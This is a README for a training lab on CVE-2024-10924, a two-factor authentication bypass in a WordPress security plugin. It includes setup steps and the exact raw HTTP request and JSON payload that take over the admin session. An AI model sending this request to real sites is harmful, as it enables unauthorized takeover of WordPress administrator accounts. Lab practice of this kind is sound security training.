## https://sploitus.com/exploit?id=ACA80540-F613-50DD-97D7-1F90E815741E
# CVE-2024-10924 Bypass MFA WordPress - Exploit Lab
This repository provides a lab for exploiting the `CVE-2024-10924` vulnerability in `WordPress`, specifically to bypass `two-factor authentication (MFA)` and gain access to the `WordPress` administration panel.
## Prerequisites
To deploy this lab in your environment, follow the steps below:
## **Deploy WordPress on VMware**
You will have to unzip the `zip` of the LAB, going to VMWare you will have to click on `Open` to import a machine, we select the file called `Ubuntu-Bypass-MFA-Wordpress.vmx`, and finally we will have to click on `Power` to turn on the vulnerable machine.
[Download LAB](https://drive.google.com/file/d/1a8h6HHDFfkyZRGUdvXdQtcYxLiXH8n_I/view?usp=sharing)
## **Configure Kali Linux**
On your Kali machine, install the necessary tools and make sure you have the following applications installed:
- `nmap`: To perform network scans.
- `requests`: To make HTTP requests (if you don't have it, install `requests` with `pip install requests`).
- `rich`: For elegant output to the console (install with `pip install rich`).
## **Get WordPress machine IP**
To get the IP of the WordPress machine in the network environment, run the following script from your Kali machine:
```bash
$ python3 knowIPwordpress.py
```
```
This script does the following:
```
Detect your local `IP`.
Scans the corresponding network segment to find active `IPs`.
Perform a port scan for `HTTP` services.
Check that the WordPress machine's `IP` has the title `"Bypass-MFA"` in its `HTTP` service.
Once found, it will show you the `URL` where you can access the `WordPress` administration panel:
```bash
Accede a WordPress en: http://<IP>/wp-admin
```
## Double Check Bypass (MFA):
### Credentials Wordpress:
```
admin:admin
```
When you try to log in to `WordPress`, it will ask you for `two-factor verification (MFA)`. To bypass this step, run the following script on your `Kali`:
```bash
$ python3 bypass-MFA-Wordpress.py
```
How the `bypass-MFA-Wordpress.py` script works
This script exploits the `CVE-2024-10924` vulnerability and bypasses double verification to gain access to the `WordPress` administration panel.
## Script flow:
Get session cookie: The script makes an `HTTP` request to the `reallysimplessl/v1/two_fa/skip_onboarding` endpoint to obtain a valid session cookie.
The request is sent with the following information:
```json
{
"user_id": 1,
"login_nonce": "133333337",
"redirect_to": "/wp-admin/"
}
```
## Login Request:
Once the cookie is obtained, the script requests the `WordPress` username and password. Then, make a `POST` request to the `wp-admin/profile.php` endpoint with the provided credentials to log in.
## Generation of an HTML file:
If the bypass is successful, the script saves the response from the administrator dashboard to a `.html` file and opens it in your default browser.
You will now have access to the `WordPress` administration panel!
## Manual way Bypass-MFA-Wordpress:
If you want to do it manually with `BurpSuite` and we want to know the `Endpoint` to which we have to send the request in order to capture the `Cookies`, we can do it in the following way
```bash
$ python3 endpointWordpress.py
```
This will tell us the code that we will have to put in `BurpSuite` to be able to capture the `Cookies`, in my case it would be something like this:
```json
POST http://192.168.5.192/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: 192.168.5.192
Content-Type: application/json
Content-Length: 89
Connection: keep-alive
{
"user_id": 1,
"login_nonce": "133333337",
"redirect_to": "/wp-admin/"
}
```
### Performing manual technique in video format:
https://github.com/user-attachments/assets/e70789d1-4fe4-46b4-81ef-76229dd265ce
## More information in my YT video:
LINK = [Video CVE-2024-10924-Bypass-MFA-Wordpress-LAB](LINK)